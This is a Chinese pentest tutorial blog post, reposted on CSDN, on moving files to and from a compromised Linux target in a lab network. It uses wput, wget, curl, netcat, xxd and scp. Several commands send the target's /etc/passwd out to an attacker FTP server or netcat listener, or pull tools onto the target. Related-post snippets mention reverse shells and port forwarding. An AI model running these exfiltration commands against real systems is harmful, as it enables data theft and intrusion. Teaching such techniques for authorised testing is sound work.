linux 内网文件传输工具_【内网渗透】Linux下的内网传输技术

最新推荐文章于 2023-04-02 12:46:27 发布
最新推荐文章于 2023-04-02 12:46:27 发布
阅读量371 收藏
点赞数
文章标签: linux 内网文件传输工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39527078/article/details/111630704
版权
本文介绍了Linux下进行内网文件传输的多种方法,包括使用Wput进行FTP上传,Wget进行下载,Curl支持HTTP/HTTPS/FTP下载,NETCAT(NC)实现文件传输,xxd工具以十六进制形式复制文件,以及SCP通过SSH安全传输文件。这些工具在内网渗透测试中非常实用。
摘要由CSDN通过智能技术生成
5548b21f316b2c34e65b99a56753264c.png点击上方 “公众号” 可以订阅哦!

Hello,各位小伙伴大家好~b9364d0fd9e4c2a1639c8397df8685c4.pngb9364d0fd9e4c2a1639c8397df8685c4.png

2d389a3852dca152f51d754b125a6344.png

这里是一名白帽的成长史~

cd048745e741800d31ba924511808fe6.png

前天我们说了Windows下的内网传输技术:

【内网渗透】Windows下的内网传输技术

今天再来看看Linux下的内网传输吧~

b5d8a067b35a41fd935a82f6afde32a8.png 4417317b9caca926dd0a8cfd0f1625e1.png

Part.1

Wput/Wget

Wput

Wput是一款linux环境下用于向ftp服务器上传的工具。

首先,我们在本地搭建一个ftp服务器,如3CDaemon:

d736bb89b89acac593db96d9d6506705.png

创建一个用户monster/a123456:

39ecdf5657291c36dea418f3dac1777f.png

例如把靶机的/etc/passwd文件上传至ftp服务器:

wput ./passwd ftp://monster:a123456@192.168.3.1
32fb2a2e47fc7cc08ae4aa12db4bf5f7.png

在ftp服务器中可以找到该文件:

ef339e126f28d90be477b58bf5d76bc1.png b7b23a3f125c4535aa4deb4ca41fd2e2.gif

Wget

Wput用于上传,Wget则用于下载。

Wget支持HTTP,HTTPS,FTP协议进行文件下载。例如使用靶机下载hash.exe:

wget --ftp-user=username --ftp-password=password ftp://192.168.3.1/hash.exe
1486b272b2eb982582becad5fc5b4c0a.png

通过http的方法进行文件下载,先在本地开启http服务:

239cfe15329c638a4816787f312cec1e.png

靶机下载文件:

wget http://192.168.3.1/editor.exe
6b2253e0aeec95a4d115133803d9c1bc.png 4417317b9caca926dd0a8cfd0f1625e1.png

Part.2

Curl

Curl

我们之前还讲过一期curl工具:

【Linux】关于Curl工具与HTTP的二三事

也可以利用该工具进行http下载:

curl –O http://192.168.3.1/editor.exe
5bdca18a4f222e39fa411256989ef3ef.png 4417317b9caca926dd0a8cfd0f1625e1.png

Part.3

NC

NC

NETCAT是kali中自带的一款功能强大的工具,我们可以通过它来文件传输。

例如传输靶机的passwd文件。

首先在本地开启监听,并将接收的内容保存为test.txt:

nc -nvv -lp 4444 > test.txt
a73b963fcf2975f5ff27e813ace2d943.png

靶机如果没有nc,可以先通过以下命令安装:

95abbf384e79c4b20ec81d34831df084.png

在靶机将目标文件传至kali:

nc 192.168.3.144 4444 < /etc/passwd
68f37af45b60253308f420a3a21d351b.png

传输完毕后在kali中可以找到该文件:

87ed4c21bc75a22174239f61cef9681c.png

关于nc的其他操作,之前也写过一期。

有兴趣的小伙伴可以看看:

【工具篇】NETCAT-网络中的瑞士军刀

4417317b9caca926dd0a8cfd0f1625e1.png

Part.4

xxd

xxd

xxd工具的作用是将一个文件以十六进制的形式显示出来。

我们可以利用该方法将靶机中的可执行文件“复制”出来。如显示hash.exe:

xxd hash.exe
b40ca5b4d1fb9ee43e75cbd18d54b202.png

将以上内容复制出来,在本地造一个一模一样的文本:

f6ce1a27e358a86e7c3783daf99075b4.png

去掉左右多余的内容:

5b98a8282a51dfe469f73499515805e1.png

替换掉空格、换行符:

deeddcd2b42840aec1479572dd90c3f0.png

打开一个十六进制编辑器导入以上内容,如010editor:

6176d3323757c0cf6358e0a819324bc2.png

另存为hash.exe并打开,程序可以正常运行:

006b516c7f4f181b44c7dc5326b3bc0d.png

//成功~

当然除了xxd工具,其他如hexdump也可以达到相同的效果:

hexdump -C hash.exe
f8a31c6ec0650bca72f854827d20363a.png 4417317b9caca926dd0a8cfd0f1625e1.png

Part.5

SCP

scp

Scp通过ssh进行数据传输,如果知道用户名和密码,也可以通过它来进行文件传输。例如,从本地复制文件到远程:

scp /etc/passwd root@192.168.3.146:/root/Desktop/password
11eb0ca30955147a2a9e939d41a6e796.png

在对端服务器可以看到传输的文件:

6d5d0ca09d6d2e322e4f92712b0b6ab6.png

从对端服务器下载文件:

scp root@192.168.3.146:/root/Desktop/payload.txt /root/payload.txt
ffd90ca3315b8dff3051492857eb11b9.png

如果出现如下报错:

Theauthenticity of host 192.168.0.xxx can't be established.

可以先按以下方法进行操作:

ssh -o StrictHostKeyChecking=no 192.168.3.146
c40275be94aee3f8d21730370a5cd892.png 4417317b9caca926dd0a8cfd0f1625e1.png

Part.6

结语

好啦,以上就是今天的全部内容了~

当然方法远不如此,如果对端是一个web服务器,你甚至可以把文件上传至web目录当中,直接访问下载。

eb83c7af3cf173f557de990a5def01c0.png

如果有问题,欢迎到公众号一名白帽的成长史留言~

Peace!96f62bc012931b3efb20e2aa0843bca6.png

c5e2777fa049db880fb441431aed976b.png

你“在看”我吗?

abf18fe2e0e4c6e45effe7ad91e1e844.png
weixin_39527078
关注
红队内网攻防渗透:内网渗透Linux内网权限提升技术:NFS&Cron&PATH
HACKONE的博客
06-08 62
NFS是一种基于TCP/IP 传输的网络文件系统协议,通过使用NFS协议,客户机可以像访问本地目录一样访问远程服务器中的共享资源。通过对计划任务中的文件的权限查看,发现具有读写执行的权限,编写计划任务覆盖源文件的内容用来反弹shell。通过扫描发现还开放了8080端口,这里缺少登陆密码,前面的加密的access.html就有这里的密码。ls -lia /etc/script/CleaningScript.sh #查看对任务文件的权限。cd /mnt/nfs # 目标机。
【渗透笔记】内网文件传输
白菜猪肉炖粉条
01-04 888
Windows FTP ftp没有设置认证,允许匿名登录的话,攻击者如果知道了机器开启ftp协议,他可以直接登录机器。 还有ftp要做一个比较好的目录权限控制,即使设置了账号密码,攻击者可以通过爆破,如果ftp目录有读取写入执行权限,攻击者会上传文件进而反弹shell。 py开启ftp服务 pip3 install pyftpdlib python3 -m pyftpdlib 脚本文件ftp.txt,用于连接ftp服务,下载文件 copy con ftp.txt open 192.168.1.111 21
linux 内网文件传输工具_内网部分
weixin_39884492的博客
11-29 417
现已知攻击机kali和边界机可以互通的但是目前kali无法访问内网机器c+++LCX+++首先将LCX工具传到边界机上---边界机开放端口的情况下—端口映射---边界机: ./lcx -tran 3333 20.20.20.20 3389将内网的3389端口映射到边界机的3333端口Kali:rdesktop 10.10.10.20:3333连接内网机的3389---边界机不开放...
Linux局域网传输文件
hu的博客
05-11 421
终端命令 远端到本地 scp -rp cccc55@192.168.1.3:/home/path /home/mypath 本地到远端 scp -rp 本地地址 远端地址
内网渗透----文件传输
浅笑996的博客
03-08 1438
0x01.Windows目标 1.FTP echo open 192.168.0.23 2121 &amp;amp;gt;&amp;amp;gt; 1.txt //登陆FTP服务器 echo 123&amp;amp;gt;&amp;amp;gt;1.txt //用户名 echo 123&amp;amp;gt;&amp;amp;gt;1.txt
Aliyun ECS服务器搭建
Su*yWGAtH26Q
11-19 192
Aliyun ECS服务器搭建搭建mysql服务器 5.6.34安装nginx服务搭建java8运行环境数据库同步数据上传程序并运行访问远程地址 搭建mysql服务器 5.6.34 linux x64 16.04 install mysql5.6.34 apt-get update 升级apt-get ubuntu16.04卸载mysql5.7安装mysql5.6 删除mysql a. sudo apt-get autoremove --purge mysql-server-5.0 b. sud
内网渗透之——数据压缩、传输
01-09
Linux 直接使用tar命令压缩 windows 利用Rar.exe(winrar.exe里的执行文件) 参数说明: a 添加文件到压缩文件中 -k 锁定压缩文件 -s产生固体存档,这样可以增大压缩比 -r包括子目录 -m 设置压缩比  -m0 存储 添加到...
内网渗透课实验—传输层隧道通信.docx
08-29
传输层隧道通信是内网渗透实验中的一种重要技术,通过使用 powercat 和 ncpowercat 工具,我们可以实现远程连接和数据传输。同时,我们还可以使用桥接模式来实现远程连接,并使用 Linux 文本编辑器来显示行号。
Linux网络编程应用 文件传输:利用TCP、base64、C语言实现电脑与电脑、电脑与开发板之间进行文件传输(可传输文档图片视频任意文件)
mbs706的博客
10-01 2660
准备工作 1、base64的加密与解密的方法有很多种,可以直接使用Linux自带的base64命令,也可以使用一些base64库,或者base64源代码等等。 2、这里我使用的是在Gethub官网上下载的一个评价最高的base64包,先下载一下: 我先说明一下,这个包代码结构比较复杂,编译也需要更改一些东西,如果是大神建议直接下载第一个,可自行编译得到所需库文件,小白建议直接下载我编译好的两个库文件,也就是第二、三个。 (一)源base64包: 链接:https://pan.baidu.com/s/16cC
Linux文件传输工具
05-16
该源码在linux下实现了一个文件的传输工具,单一文件继承了客户端和服务器,用户可以选择启动为服务器还是客户端,客户端可以用put和get命令向服务器发送和下载文件..
Linux下网络串口透传实现代码
01-14
Linux下网络串口透传功能的实现,c语言程序,在使用前请阅读readme.txt
linux下两台服务器内网文件传输,nexus切换服务器
Justin的专栏
10-25 1165
本篇文章既实现了对两台服务的内网文件传输,还实现了对nexus的切换服务器。我的nexu有20多G,通过内网传输不到2分钟搞定。
渗透测试之内网渗透中的数据传输
Blood_Pupil的博客
07-01 1636
DNS隧道
【渗透测试笔记】之【内网渗透——传输层隧道(PowerCat的使用:正反向shell、文件传输、dns隧道、生成powershell payload、内网转发)】
AA8j的博客
10-22 982
写在前面:PowerCat是PowerShell版本的nc,主要用于windows平台。 1 实验环境 kali(攻击机,外网地址:192.168.8.48) Windows2012(边界服务器,外网地址:192.168.8.57,内网地址:10.1.1.10) CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13) DC(内网地址:10.1.1.2) 2 下载与部署 2.1 下载 下载地址:https://github.com/besimorhino/powerc
同一局域网下的Liunx服务器之间文件互传
最新发布
youban_47的博客
04-02 1272
同一局域网下的Liunx服务器之间文件互传
linux局域网传输文件
u013181648的博客
08-13 1838
想必大家在linux下面局域网内传东东还是有些郁闷的。下面介绍一个命令,可以让你在局域网内随意传东东,不需要开任何服务。以下均是抄来的。 Using netcat and tar to quickly transfer files between machines, aka tar pipe So you have gigs of data to transfer between tw
linux下c网络编程实现串口与网口的信息透传_正点原子【STM32-F407探索者】第六十章 网络通信实验...
weixin_40006963的博客
11-21 722
1)资料下载:点击资料即可下载2)对正点原子Linux感兴趣的同学可以加群讨论:9354467413)关注正点原子公众号,获取最新资料更新http://weixin.qq.com/r/hEhUTLbEdesKrfIv9x2W (二维码自动识别)本章,我们将向大家介绍探索者 STM32F4 开发板的网口及其使用。本章,我们将使用 ALIENTEK 探索者 STM32F4 开发板自带的网口和 LWIP...
linux串口无线透传,一种无线串口透传系统的制作方法
weixin_32596893的博客
05-11 259
一种无线串口透传系统的制作方法【技术领域】[0001]本发明属于串口透传技术领域。尤其涉及一种无线串口透传系统。【背景技术】[0002]无线传输是指利用无线技术进行数据传输的一种方式。由于无线传输具有安装方便、灵活性强、性价比高等特点,使其在通讯领域得到了广泛应用。串口是最常用的有线传输接口之一,但是在许多应用场合中,由于接线复杂或其他限制,需要将串口的有线传输转化为无线传输。[0003]现有的一...
内网渗透:数据压缩与Windows FTP传输详解
总结来说,内网渗透中数据压缩和传输是必不可少的技术,熟练掌握Linux的tar命令和Windows的Rar.exe工具,以及FTP的命令行操作,能够有效提高数据管理的效率和安全性。在实际操作中,根据具体环境和需求灵活运用这些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值